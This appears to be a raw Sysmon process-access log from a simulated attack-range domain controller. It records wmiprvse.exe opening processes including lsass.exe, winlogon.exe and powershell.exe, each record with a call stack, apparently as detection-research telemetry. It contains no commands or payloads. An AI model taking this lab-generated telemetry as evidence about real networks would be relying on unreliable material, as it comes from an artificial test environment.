15:59:38.256{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026617Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.256{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1400-00000000A301}1280C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026616Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.256{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1300-00000000A301}1264C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026615Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.256{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1200-00000000A301}1176C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026614Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.256{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1100-00000000A301}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026613Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.256{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1000-00000000A301}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026612Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.256{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0F00-00000000A301}1112C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026611Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.256{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026610Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.256{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0D00-00000000A301}996C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026609Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.256{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4986-6008-0C00-00000000A301}608C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026608Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.256{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026607Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.256{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4984-6008-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026606Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.210{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5369-6008-6A06-00000000A301}6204C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026605Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.210{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5369-6008-6906-00000000A301}5376C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026604Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.210{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5368-6008-6806-00000000A301}3256C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026603Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.210{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5359-6008-4306-00000000A301}4856C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026602Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.210{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5357-6008-3E06-00000000A301}6760C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026601Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.210{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5356-6008-3906-00000000A301}4832C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026600Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.210{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5354-6008-3406-00000000A301}6596C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026599Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.210{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5353-6008-2F06-00000000A301}3716C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026598Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 